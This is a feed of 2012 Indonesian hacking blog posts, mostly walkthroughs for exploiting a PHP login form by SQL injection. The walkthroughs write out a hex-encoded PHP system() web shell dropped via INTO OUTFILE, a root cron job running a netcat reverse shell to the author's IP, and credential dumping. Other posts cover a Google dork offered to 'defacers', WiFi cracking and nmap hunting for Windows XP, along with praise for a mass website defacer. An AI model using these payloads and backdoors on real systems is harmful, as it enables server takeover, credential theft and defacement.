[14:45:55] [INFO] trying to upload the file stagerwhich web application language does the web server support?[1] ASP[2] ASPX[3] PHP (default)[4] JSP

Karena kali ini korban saya menggunakan web aplikasi berbahasa PHP, maka saya pilih nomer 3. Tekan enter, kemudian anda diharuskan untuk menentukan, kemana file ini akan diupload?

Output :

please provide the web server document root [/var/www/]:

Pada pilihan ini, saya masukan /var/www/. Sedikit catatan untuk pembaca, dalam kenyataannya, anda akan berhadapan dengan web server dengan banyak user, sehingga document root tidak mungkin berada pada folder /var/www/. Beberapa web server, mengatur document root nya pada diretory /home/, atau /var/www/hosts, atau /var/www/vhosts, atau /var/www/[victim]. Setelah menentukan document root, tekan enter. Pada tahap selanjutnya, anda bisa membiarkan value atau jawaban kosong, cukup tekan enter sampai proses upload selesai. Jika berhasil, maka anda akan mendapat output seperti ini:

Output :

[14:46:08] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://10.10.1.128:80/tmpbbxju.php[14:46:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell>

3. Game Over

Jika berhasil, maka anda hanya perlu memasukan perintah ke dalam os-shell interpreter. Dan menjawab "Y" pada setiap pertanyaan yang muncul.

Output :

os-shell> iddo you want to retrieve the command standard output? [Y/n/a] Ycommand standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

It is so powerful, isn't it?

created by : red-dragon

SQL Injection Level 4 [Final]

noreply@blogger.com (Double Dragon) — Tue, 01 May 2012 05:28:00 +0000

Setelah kita menjalani tiga step dari SQL Injection level 4, akhirnya kita sampai di tahap final. Tahap final adalah tahap rooting. Kali ini saya akan menjelaskan cara melakukan rooting hanya dengan menggunakan teknik SQL Injection level 4.

Masih sama dengan posting tempo lalu, saya masih menggunakan burpsuite untuk membantu saya dalam melakukan decode dan sql injecting.

Preparation :

Burpsuite [dapat ditemukan di backtrack]
Netcat [dapat ditemukan di backtrack]

Briefing :

Ketahuilah apa fungsi dari file yang terdapat di directory /etc/cron.d/
Membuat file baru pada directory /etc/cron.d/ dengan perintah back connect root kepada komputer attacker.
Game Over.

Walkthrough

1. Apa itu file cron.d?

Saya akan menjelaskan dengan singkat, apa fungsi dari file /etc/cron.d. File yang terdapat dalam directory ini akan dieksekusi setiap 2 - 5 menit sekali oleh user yang bersangkutan. User yang bersangkutan?

Contoh sederhana dari file /etc/cron.d/ adalah

Command :

* * * * * www-data date>>/tmp/date

Kita memiliki contoh file cron.d di sini, sebut saja nama file ini date

Command :

<< back|track 5 R2 [~] ls -l /etc/cron.d/date

-rw-r--r-- 1 root root 35 2012-05-01 12:01 /etc/cron.d/date

Command :

<< back|track 5 R2 [~] cat /etc/cron.d/date* * * * * www-data date>>/tmp/date

User www-data akan mengeksekusi perintah

date>>/tmp/date

Dimana output dari perintah date akan disimpan di /tmp/date. Sekarang kita cek isi dari file /tmp/date

Command :

<< back|track 5 R2 [~] cat /tmp/date

Tue May  1 11:24:57 WIT 2012
Tue May  1 11:26:01 WIT 2012

Perhatikan, file /etc/cron.d/date dieksekusi setiap 2 menit. Bagaimana jika user kita ganti dengan root? Tentu saja bisa.

2. Back connect root

Kita bisa melakukan back connect root jika netcat dieksekusi oleh root. Sederhananya, kita cukup mengganti user dengan root, kemudian kita tambahkan dengan dengan peritah back connect netcat.

Command :

* * * * * root /bin/nc.traditional 172.16.243.1 1234 -e /bin/bash

Anda bisa mencari tau mengapa saya bisa menemukan netcat pada server target di posting SQL Injection Level 4 [Part 3]. Sementara 172.16.243.1 adalah IP Address saya.

Kemudian kita decode perintah ini dari ASCII ke HEX dengan bantuan burpsuite. Saya tidak akan menjelaskan lagi cara melakukan decode ASCII ke HEX dengan burpsuite, anda dapat membacanya pada postingan sebelumnya pada SQL Injection Level 4 [Part 3].

Ok. Perintah suda di decode menjadi HEX. Sekarang perintah menjadi

Command :

2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203137322e31362e3234332e312031323334202d65202f62696e2f626173680a

Catatan Penting:
Ketika melakukan decode dengan burpsuite, pastikan anda menambahkan line baru setelah perintah netcat. Perhatikan gambar di atas.

Setelah di decode, maka kita masukan perintah SQL seperti ini:

Command :

myusername=admin&mypassword=%27 and 1=1 union select 0x20,0x20,0x20 into outfile '/etc/cron.d/backdoor' lines terminated by 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203137322e31362e3234332e312031323334202d65202f62696e2f626173680a -- &Submit=Login

Perintah di atas akan membuat file baru bernama backdoor pada directory /etc/cron.d/. Sebelum klik tombol GO pada burpsuite, masukan perintah berikut pada terminal, ini berfungsi agar anda dapat menerima koneksi netcat dari root komputer target.

Command :

<< back|track 5 R2 [~] netcat -l -v -p 1234
listening on [any] 1234 ...

Kemudian klik tombol GO. Ok, kali ini saya akan membuat bukti bahwa file cron.d dieksekusi dalam 2 menit. Setelah mengklik tombol GO, saya melakukan cek tanggal dan waktu.

Command :

<< back|track 5 R2 [~] dateTue May 1 11:45:53 WIT 2012

3. Game Over

Jika file /etc/cron.d/backdoor pada server target berhasil dieksekusi, maka pada konsol netcat akan muncul.

Command :

<< back|track 5 R2 [~] netcat -l -v -p 1234
listening on [any] 1234 ...

172.16.243.128: inverse host lookup failed: Unknown host
connect to [172.16.243.1] from (UNKNOWN) [172.16.243.128] 50648

Kemudian saya cek kembali tanggal saya

Command :

<< back|track 5 R2 [~] dateTue May 1 11:45:53 WIT 2012<< back|track 5 R2 [~] dateTue May 1 11:47:03 WIT 2012

File /etc/cron.d/backdoor dieksekusi dalam waktu kurang dari 2 menit. Sekarang kita cek ID pada netcat kita, apakah ini root?

Command :

<< back|track 5 R2 [~] netcat -l -v -p 1234
listening on [any] 1234 ...

172.16.243.128: inverse host lookup failed: Unknown host
connect to [172.16.243.1] from (UNKNOWN) [172.16.243.128] 50648

id
uid=0(root) gid=0(root) groups=0(root)

There you go! You got root.

You are so #pwned by : red-dragon

About The Greatest Hacker

noreply@blogger.com (Double Dragon) — Sat, 21 Apr 2012 03:33:00 +0000

Sebelum saya menjelaskan siapa Hacker Terhebat di dunia versi saya, saya akan menyebutkan kriteria hacker yang berkualitas.

Hacker bukan seseorang yang hebat menggunakan perangkatnya saja, melainkan hebat menggunakan akalnya.
Hacker yang melakukan defacing web site dengan tujuan mencari popularitas, tidak lebih dari seorang n00b.
Hacker yang menyukai satu metode dalam kondisi yang sama, tidak lebih dari seorang fanatik.
Andakah hacker berkualitas tersebut? Jika anda ingin nama anda dimasukan di dalam daftar tunggal ini, maka anda harus melakukan komparasi terhadap hacker yang saya agungkan ini.

Perkenalkan....

TiGER-M@TE

Apa yang membuat hacker ini hebat? OK, saya akan menjelaskan sepak terjang hacker yang satu ini.

Meretas 700.000 situs

Hacker ini berkewargenagaraan Bangadesh, memulai dunia peretasannya dari tahun 2007 hingga saat ini. Hacker ini bergerak secara diam-diam dan tertutup dengan baik (underground hacker). Hingga namanya mencuat pada pertangahan september 2011, karena melakukan defacing 700.000 (Tujuh Ratus Ribu) website dalam satu kali aksi!

TiGER-M@TE: "Secara teknis, saya meretas 700.000 situs. Itu mungkin menjadi rekor dunia baru. Setelah mengajukan 200.000 website yang saya retas ke Zone-H, situs Zone-H menjadi down berulang kali, dan hampir tidak responsif pada akhirnya. Sehingga saya tidak bisa mengajukan semua daftar situs yang saya retas ke Zone-H. Sehingga saya mencatat 700.000 situs yang saya retas di multiupload. Itu bukan sekedar peretasan server, sebenarnya semua data center telah diretas."

Beberapa daftar situs yang berhasil di-submit ke zone-h dapat dilihat di sini.

Meretas situs Google

Pada 8 January 2011. Negara Bangladesh dikejutkan dengan situs Google yang berubah tampilan menjadi seperti ini.

Cache masih tersimpan di sini

Bagaimana mungkin?!

Unix Root : "Ceritakan pada kami mengenai identitas anda"

TiGER-M@TE: "Saya berkewarganegaraan bangladesh, memulai dunia peretasan pada tahun 2007 dan saya bekerja sendiri. Saya lebih suka meretas server daripada meretas aplikasi web"

Unix Root : "Apa benar anda yang meretas Google pada 8 Januari 2011?

TiGER-M@TE : "Sebenarnya bukan hanya google, saya juga meretas Yahoo, Avast, Microsoft, Bing, Nokia, dan Kaspersky"

Unix Root : "Bagaimana anda bisa meretas Google, banyak hacker yang ingin tau cara ini"

TiGER-M@TE : "Sebenarnya itu adalah DNS HiJack, bukan DNS Poison"

Unix Root : "Apakah ada kerusakan yang anda buat, atau apakah anda mengambil backup data milik google?"
TiGER-M@TE : "Karena metode yang saya gunakan adalah DNS HiJack, jadi tidak ada kerusakan data pada domain tersebut."

Unix Root : "Apa ada peretasan besar lainnya yang pernah anda lakukan?"
TiGER-M@TE : "Peretasan besar... Saya adalah pria yang meretas Airtel, Warid, dan American Express."

Unix Root : "Ada pesan untuk hacker-hacker di luar sana?"
TiGER-M@TE : "Coba tulis kode exploit milik anda sendiri, Gunakan kode exploit anda sendiri, jangan gunakan kode exploit milik orang lain. Ini akan membantumu untuk mendapatkan apapun yang kau butuhkan sebelum proses peretasan, ketahui setiap hal dan ketahui bagaimana sebuah proses bekerja. Meretas adalah semua tentang pengetahuan dan skill"

Saya rasa ini adalah jalan hacker yang sesungguhnya. Bukan hacker yang hanya mengandalkan SQLinjection, LFI, RFI, DNS Poisoning, BOT, dan Jumping Server. Jika anda memiliki versi lain dari hacker terhebat di dunia, berikan pendapat anda ke doubledragon666@gmail.com

writen by : red-dragon

SQL Injection Level 4 [Part 3]

noreply@blogger.com (Double Dragon) — Thu, 12 Apr 2012 05:32:00 +0000

Ini adalah kelanjutan dari SQL Injection Level 4 [Part 2]. Sebelum masuk ke tahap ini, saya sarankan pembaca memahami konsep dari Part 1, dan Part 2 terlebih dahulu.

Kali ini saya masih menggunakan tools burpsuite.

Preparation :

Burpsuite
Browser

Legal Disclaimer:

Tutorial ini bertujuan sebagai pembelajaran dan edukasi, penyalah gunaan ilmu ini di luar tanggung jawab penulis.

Walkthrough

1. Mengenal konsep backdoor php

Pada tutorial sebelumnya, saya sudah menjelaskan mengenai dumping username dan password menggunakan perintah sederhana yang dilakukan oleh repeater pada tool burpsuite. Kali ini saya akan memasang backdoor sederhana, hanya dengan menggunakan burpsuite.

Contoh sederhana dari backdoor php dengan menggunakan perintah passthru.

Command :

<?php

passthru($_GET['cmd']);

?>

Kemudian saya sedikit modifikasi menjadi.

Command :

<?php
if(isset($_REQUEST['cmd'])){        echo "<pre>";        $cmd = ($_REQUEST['cmd']);        system($cmd);        echo "</pre>";        die;}
?>

2. Encoding ASCII to HEX with Burpsuite
Mengetahui shell code kita harus berformat hexadecimal, maka kita harus melakukan converting dari ASCII ke HEX. Burpsuite telah menyediakan fitur ini. Klik tab decoder, kemudian pada drop down menu "encode as..." pilih "ascii hex". Pada text menu (atas), masukan shell code anda. Kali ini saya menggunakan shell code milik saya, dan shell code saya telah dikonfersikan ke HEX pada text menu bagian bawah.

Command :

3c3f7068700a0a696628697373657428245f524551554553545b27636d64275d29297b0a20202020202020206563686f20223c7072653e223b0a202020202020202024636d64203d2028245f524551554553545b27636d64275d293b0a202020202020202073797374656d2824636d64293b0a20202020202020206563686f20223c2f7072653e223b0a20202020202020206469653b0a7d0a0a3f3e

3. Burpsuite In Action
Kita telah mengubah shell code manjadi HEX format, selanjutnya kita masukan perintah SQL, sehingga perintah SQL menjadi

Command :

myusername=admin&mypassword=' AND 1=1 union select 0x20,0x20,0x20 INTO OUTFILE '/var/www/backdoor.php' LINES TERMINATED BY 0x3c3f7068700a0a696628697373657428245f524551554553545b27636d64275d29297b0a20202020202020206563686f20223c7072653e223b0a202020202020202024636d64203d2028245f524551554553545b27636d64275d293b0a202020202020202073797374656d2824636d64293b0a20202020202020206563686f20223c2f7072653e223b0a20202020202020206469653b0a7d0a0a3f3e -- &Submit=Login

Jangan klik tombol GO. Sebelumnya saya akan membuktikan bahwa belum ada file backdoor.php di dalam web server. Saya akan mengujinya dengan perintah curl.

Command :

red-dragon [~] >> curl http://172.16.33.131/backdoor.php

Hasil.

Command :

red-dragon [~] >> curl http://172.16.33.131/backdoor.php

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /backdoor.php was not found on this server.</p><hr><address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 172.16.33.131 Port 80</address>

4. Access Backdoor
Kembali ke burpsuite, kemudian tekan tombol GO. Dan kita cek lagi keberadaan backdoor.php pada server.

Command :

red-dragon [~] >> curl http://172.16.33.131/backdoor.php?cmd=id

It's easy, as usual.

created by : red-dragon

SQL Injection Level 4 [Part 2]

noreply@blogger.com (Double Dragon) — Thu, 12 Apr 2012 00:50:00 +0000

Pada postingan sebelumnya, kita telah membahas tentang melakukan SQL Injeksi Tahap 4 menggunakan SQLmap, dan Tamper Data. Kali ini saya akan melakukan hal yang berbeda dari tutorial SQL Injeksi manapun, karena saya menggunakan tools OWASP Burpsuite.

Target saya masih sama dari target pada postingan sebelumnya, dengan alasan yang sama, saya tidak mau membuat kerusakan pada situs milik orang lain.

IP target : 172.16.33.131

Important!!!

Tutorial ini bertujuan sebagai pembelajaran, penyalah gunaan yang membuat kerugian terhadap pihak lain di luar tanggung jawab penulis.

Preparation :

Browser
Burpsuite (dapat ditemukan di backtrack 5)

Walkthrough :

1. Menyiapkan burpsuite

Burpsuite dapat ditemukan di backtrack 5. Pada start menu, pilih Applications - Backtrack - Vulnerability Assessment - Web Application Assessment - Web Application Proxies - Burpsuite.

Burpsuite akan menangkap setiap paket atau data yang dikirim dari client ke server, dengan syarat client harus menggunakan proxy burpsuite. Untuk melakukan pengaturan proxy, lakukan langkah berikut:

Klik tab Proxy
Pada tab intercept, klik "Intercept is on" sehingga menjadi "Intercept is off"
Pada tab options, perhatikan port burpsuite yang aktif. Kali ini saya menggunakan pengaturan umum, yaitu 8080.
Klik tab Target, pada tab ini semua data dan packet akan muncul.

Jangan tutup burpsuite, karena kita masih menggunakan tool ini.

2. Menyiapkan Browser

Anda bisa menggunakan browser apapun, namun dalam tutorial ini, saya menggunakan browser Mozilla Firefox. Untuk melakukan pengaturan proxy, lakukan langkah berikut:

Edit
Preferences
Advanced
Network
Settings
Pilih Manual Proxy Configuration
Pada http proxy, masukan 0.0.0.0
Para port proxy masukan 8080
Klik OK

3. Burpsuite Intercepting

Sekarang masukan IP 172.16.33.131 pada address bar. Kemudian login dengan

Username : admin

Password : '

Klik Login. Kemudian kembali pada burpsuite, maka akan muncul data yang berhasil dihadang (intercepted) oleh burpsuite.

4. Burpsuite In Action

Pada pembahasan sebelumnya, kita telah mengetahui, bahwa vulnerability terletak pada halaman checklogin.php. Jika anda masih bingung mengapa halaman ini memiliki vulnerability, saya sarankan anda membaca postingan sebelumnya mengenai SQL Injection Level 4 [Part 1]. Klik kanan pada bagian /checklogin.php, kemudian pilih "send to repeater".

Pada tab repeater. Perhatikan bagian

myusername=admin&mypassword='&Submit=Login

Pada pembahasan sebelumnya, kita juga sudah mengetahui bahwa parameter "mypassword" memiliki vulnerability terhadap serangan SQL Injection. Ini terlihat dari pesan:

mysql_num_rows(): supplied argument is not a valid MySQL result resource in

5. Dumping Username + Password With Burpsuite

Melakukan dumping username dan password belum pernah secepat dan semudah ini. Biasanya anda harus mencari table dan kolom yang tepat untuk mendapatkan username dan password. Namun kali ini anda hanya membutuhkan satu perintah saja. Ubah bagian:

myusername=admin&mypassword='&Submit=Login

Menjadi

myusername=admin&mypassword=' OR 1=1 INTO OUTFILE '/var/www/dump' -- &Submit=Login

Jangan klik tombol GO. Untuk membuktikan bahwa username dan password berhasil di dump ke /var/www/dump, kita akan menguji keberadaan file dump pada server dengan perintah curl.

Command :

red-dragon [~] >> curl http://172.16.33.131/dump

Maka akan muncul

Command :

red-dragon [~] >> curl http://172.16.33.131/dump

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dump was not found on this server.</p><hr><address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 172.16.33.131 Port 80</address></body></html>

Terlihat bahwa file dump memang tidak ada (belum ada). Kemudian klik tombol go pada burpsuite. Dan lakukan pengecekan lagi dengan curl.

Command :

red-dragon [~] >> curl http://172.16.33.131/dump1 john MyNameIsJohn2 robert ADGAdsafdfwt4gadfga==

It's easy, isn't?

created by : red-dragon

SQL Injection Level 4 [Part 1]

noreply@blogger.com (Double Dragon) — Tue, 10 Apr 2012 05:38:00 +0000

Bosan dengan perintah

(select group_concat(table_name) from information schema.tables where table_schema=database())

Kali ini saya akan memberikan sedikit pelajaran mengenai SQL Injection level 4. Pada tutorial kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware.

Preparation :

Firefox
Tamper Data (add ons mozilla firefox)
SQLmap

Walkthrough

1. Menguji vulnerability.

Kali ini, vmware saya telah berjalan dan memiliki ip address 172.16.33.131. Saya buka firefox, kemudian saya masukan IP address 172.16.33.131 pada address bar.

Username : admin

Password : admin

Kita berada di halaman checklogin.php. Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login.

Username : admin

Password : '

Kelihatannya website ini vulnerable. Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan tamper data.

2. Tamper Data In Action

Jika anda belum memiliki tamper data, anda bisa install di sini. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.

Setelah menginstall, tamper data dapat diaktifkan di Tools - Tamper Data

Kembali ke halaman login

Username : admin

Password : 123

Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.

OK. Saya temukan POSTDATA=myusername=admin&mypassword=123&Submit=Login. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan. Sebelumnya saya ucapkan terima kasih pada tamper data. =)

3. SQLmap in Attack

Command :

red-dragon [~] >> cd /pentest/database/sqlmap/

Command :

red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --flush-session

Keterangan:

-u = url [Pesan error muncul pada halaman checklogin.php]
--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]
-p = parameter [Parameter yang vulnerable adalah mypassword
--flush-session = Bagian ini tidak masalah jika tidak disertakan.

Muncul pertanyaan:

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Kemudian muncul lagi:

sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

dan berujung pada CRITICAL:

[CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

4. Game Over

Saya coba naikan level dan risk pada testing SQLmap menjadi 5.

Command :

red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5

Kemudian muncul lagi:

sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Dan muncul pesan yang membahagiakan:

POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

Saya jawab "n", kemudian "enter".

Dan payload untuk website ini adalah:

Place: POST

Parameter: mypassword

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: POSTDATA=myusername=admin&mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&Submit=Login

Type: AND/OR time-based blind

Title: MySQL < 5.0.12 AND time-based blind (heavy query)

Payload: POSTDATA=myusername=admin&mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&Submit=Login

Sempurna....

created by : red-dragon

Hunting Windows XP with NMAP

noreply@blogger.com (Double Dragon) — Wed, 21 Mar 2012 05:54:00 +0000

Kalian yang gemar melakukan exploitasi system, mungkin mengincar system operasi windows XP. Ada beberapa tools yang bisa digunakan untuk melakukan information gathering guna memburu system operasi ini. Diantaranya yang terkenal adalah:

Angry IP Scanner
NMAP

Masalahnya adalah, anda tidak bisa mendeteksi OS yang digunakan oleh sebuah host jika anda menggunakan Angry IP Scanner. Karena Angry IP scanner hanya dapat mendeteksi NET BIOS pada port 445 dan 135, serta mendeteksi port 80 protokol milik HTTP.

Kita telah mengetahui bahwa NMAP mampu melakukan scanning secara detil dan cepat. Dan parameter yang bisa digunakan untuk melakukan scanning OS adalah parameter -O.

Command :

root@dark-slayer:~# nmap -O <ip address>

Ternyata parameter ini memiliki kelemahan dalam mendeteksi OS, mengapa? Karena hasilnya tidak akurat, dan memakan waktu yang cukup lama. Bagaimana cara mengatasi hal ini?

Pertama, anda harus mengetahui, bahwa mendeteksi OS dapat dilakukan melalui pemindaian pada port 445. Maka perintah NMAP adalah:

Command :

root@dark-slayer:~# nmap -p 445 10.20.0.1-255

Perintah ini akan menampilkan sederet informasi mengenai status port 445 pada setiap host dalam sebuah localhost. Langkah kedua adalah menemukan port 445 yang terbuka.

Kita telah menemukan beberapa host yang membuka port 445 nya. Diantaranya adalah:

10.20.0.103

10.20.0.192

10.20.0.193

Kemudian kita scan host ini satu per satu dengan perintah:

Command :

root@dark-slayer:~#  nmap -p 445 -sV -Pn -v <ip address>

Kita mulai dari:

Command :

root@dark-slayer:~#  nmap -p 445 -sV -Pn -v 10.20.0.103

Jika tidak muncul versi di sebelah kolom service. Maka sudah dapat dipastikan ini bukan windows XP. Terbukti cara ini mempersingkat waktu pemindaian, hanya memakan waktu 6 detik. Jika muncul versi di sebelah kolom service, misalkan Microsoft Windows XP, sudah dapat dipastikan bahwa host menggunakan Operasi System Windows XP.

created by : red-dragon

Spawning Bash via Backdoor

noreply@blogger.com (Double Dragon) — Mon, 19 Mar 2012 12:48:00 +0000

Backdoor adalah elemen yang wajib ditanam ketika berhasil melakukan gaining access. Salah satu backdoor yang sering ditemukan adalah backdoor pada sebuah webserver. Dengan hanya menggunakan netcat, user mampu menembus webserver melalui port backdoor yang sudah ditentukan. Namun backdoor ini tampak hampa. Mengapa? Karena tidak ada tty yang aktif dalam shell tersebut. Akibatnya beberapa perintau seperti perintah sudo, tidak bisa dilakukan.

Sebagai contoh, anda menemukan kejadian seperti ini:

Tampak kosong bagaimana? Oke terlihat perbedaan antara shell yang wajar, dan backdoor shell yang satu ini. Shell yang wajar akan menampilkan

Command :

root@root:~# id

Namun di kasus ini tampak kosong!

Command :

id

Untuk mengaktifkan tty, anda harus dapat mengeksekusi tty baru. Agar header root@root dapat keluar. Jika root@root:~# telah keluar, makan tty sudah terksekusi. Dan perintah sudo bisa dieksekusi. Untuk mengeksekusi tty, saya akan menggunakan python interpreter untuk mengaktifkan tty. Simple, cukup masukan perintah ini:

Command :

python -c 'import pty; pty.spawn("/bin/sh")'

Maka header akan tampak seperti ini

Command :

python -c 'import pty; pty.spawn("/bin/sh")'sh-3.2$

Sempurna

created by : red-dragon

Fast SLQmap

noreply@blogger.com (Double Dragon) — Sat, 10 Mar 2012 11:12:00 +0000

SQLmap adalah program berbasis konsol untuk penetration testing database. Karena berbasis konsol maka anda harus menjalankannya melalui terminal. Dan yang melelahkan adalah, anda harus mengubah working directory ke /pentest/database/sqlmap

Command :

root@root:~# cd /pentest/database/sqlmap

Kemudian mengeksekusinya dengan perintah

Command :

root@root:/pentest/database/sqlmap# ./sqlmap.py

Hal ini menjadi melelahkan dan membosankan jika anda melakukannya berkali-kali. Saya memiliki jalan pintas untuk hal ini, sederhana, namun sangat membantu untuk mempersingkat penetration testing.

Buka terminal, lalu masukan perintah:

Command :
root@root:~# cd /usr/sbin/

Kemudian

Command :

root@root:/usr/sbin# ln -s /pentest/database/sqlmap/sqlmap.py

Kemudian

Command :

root@root:/usr/sbin# chmod +x sqlmap.py

Untuk mengeksekusi sqlmap, anda hanya perlu mengetik sqlmap.py pada terminal, tanpa harus mengubah working directory ke /pentest/database/sqlmap

created by : red-dragon

Install Flash Player On BackTrack

noreply@blogger.com (Double Dragon) — Mon, 05 Mar 2012 09:35:00 +0000

If have a problem when you open youtube or speedtest because you don't have flash player on your << back | track.

Just follow this step.

Command:

root@revolution:/# apt-get update

Then

Command:

root@revolution:/# apt-get install flashplugin-installer

Wait until flashplugin-installer finish to download the file, then restart your browser.

Admin Page Finder [LINUX]

noreply@blogger.com (Double Dragon) — Thu, 23 Feb 2012 09:33:00 +0000

Muter-muter sampe kepala muter 360 derajat, tapi belum menemukan hasil dalam mencari admin page finder untuk linux? Jangan kuatir. Saya akan memberikan anda script perl untuk menemukan halaman administrator dalam proses defacing.

Anda bisa download di sini

Uji keberhasilan script:

Screenshoot

[FIX] Connection To BlueZ Failed

noreply@blogger.com (Double Dragon) — Wed, 22 Feb 2012 08:40:00 +0000

Mungkin anda pernah mengalami hal ini ketika anda menginstall bluez.

Berikut cara menyembuhaknnya.

Buka terminal, lalu masukan perintah:

Command:

root@revolution:/# su -

Kemudian

Command:

root@revolution:/# bluetoothd -u

Kemudian jalankan lagi bluez di System - Preferences - Bluetooth Manager

Done. You've got your own bluetooth

created by : red-dragon

Powerful Dork For SQLi [1]

noreply@blogger.com (Double Dragon) — Thu, 16 Feb 2012 03:22:00 +0000

Untuk para defacer. Saya akan bagikan dork untuk mencari vulnerable server. Dork ini akan mencari web yang vulnerable terhadap SQLi type UNION QUERY

dork : "The used SELECT statements have a different number of columns" inurl:product.php

Contoh :

Happy Hunting =)

red-dragon

[SCRIPT] Cracking Password WiFi Otomatis dengan WiFire

noreply@blogger.com (Double Dragon) — Fri, 10 Feb 2012 06:31:00 +0000

Beberapa hari yang lalu saya pernah membuatkan script untuk mempermudah setting pada network kamu. Sekarang, saatnya lebih serius. Saya telah membuat sebuah script (Lebih optimal jika dijalankan di BackTrack) yang berfungsi untuk melakukan cracking password WiFi secara otomatis berdasarkan software AirCrack-ng dan MacChanger.

Script ini diberi nama WiFire. Ada beberapa fitur unggulan script ini, diantaranya:

Bisa melakukan konfigurasi Wordlist
Mendeteksi client WiFi
Mendeteksi teknologi enkripsi WiFi
Otomatis melakukan attacking dan cracking password
Otomatis mencoba masuk ke dalam jaringan setelah password ditemukan

Berikut adalah gambaran script ini:

Memilih Dictionary

Memilih Access Point

Attack Fake Authentication

Attack Deauthentication Single Mac

Attack Deauthentication All Client

Untuk mendownload script ini, gunakan perintah git pada terminal kamu:

root@bt:~# git clone https://github.com/blusp10it/WiFire

Setelah itu:

root@bt:~# cd WiFire/

Dan untuk mengekseusi script-nya, gunakan perintah:

root@bt:~/WiFire# bash WiFire

Selamat mencoba (=

Script by blusp10it

FireNix, Konfigurasi Network Linux

noreply@blogger.com (Double Dragon) — Tue, 07 Feb 2012 16:44:00 +0000

Beberapa hari ini, saya membuat sebuah script sederhana yang bisa digunakan di semua distro Linux. Script ini berfungsi untuk melakukan setting Firewall berdasarkan IPTables dan ARPTables.

Script ini telah diuji dan sedang dalam pengembangan. Beberapa fitur yang ada dalam script ini adalah:

Memasang firewall dengan konfigurasi yang mendasar
Melakukan reset settingan firewall
Menutup port yang terbuka
Memblokir IP yang diduga sebagai attacker

Keuntungan menggunakan script ini adalah, mempermudah kita dalam mempertahankan diri dari serangan sniffer. Karena, dengan mengaktifkan fungsi firewall pada software ini, IP kamu tidak akan bisa di PING (=

Untuk mendownload, kamu bisa gunakan perintah git:

# git clone https://github.com/blusp10it/FireNix

Lalu jalankan scriptnya dengan perintah:

# bash FireNix

Tampilan FireNix

Memasang FireWall

Mereset Setting FireWall

Mengecek Status FireWall

Memblokir IP Attacker

Cek Port yang Terbuka

Script By

Bye bye (=

View Repository: https://github.com/blusp10it/FireNix

Add me on FaceBook: https://www.facebook.com/blusp10it

Are you blusp10it?

FIX Ettercap ip_forwarding was disabled, but we cannot re-enable it now

noreply@blogger.com (Double Dragon) — Tue, 07 Feb 2012 06:08:00 +0000

Ettercap mengalami banyak bug pada backtrack 5 R1. Kali ini bug memunculkan pesan error:

ip_forwarding was disabled, but we cannot re-enable it now.

remember to re-enable it manually

Bagaimana cara mengatasinya?

1. Buka terminal, lalu masukan perintah:

Command:

root@revolution:/# nano /usr/local/etc/etter.conf

Maka anda akan melihat tampilan seperti ini:

######################################################################### ## ettercap -- etter.conf -- configuration file ## ## Copyright (C) ALoR & NaGA ## ## This program is free software; you can redistribut it and/or moify ## it under the terms of the GNU General Public Licese as publishedby ## the Free Software Foundation; either version 2 o the License, or ## (at your option) any later version. ## ## $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alr Exp $ ## #########################################################################

Carilah baris seperti ini:

######################################       redir_command_on/off###################################### you must provide a valid script for your operating system in order to have# the SSL dissection available# note that the cleanup script is executed without enough privileges (because# they are dropped on startup). so you have to either: provide a setuid program# or set the ec_uid to 0, in order to be sure the cleanup script will be# executed properly# NOTE: this script is executed with an execve(), so you can't use pipes or# output redirection as if you were in a shell. We suggest you to make a script if# you need those commands.

Pada bagian

#---------------# Linux#---------------

Cari baris:

# if you use iptables:

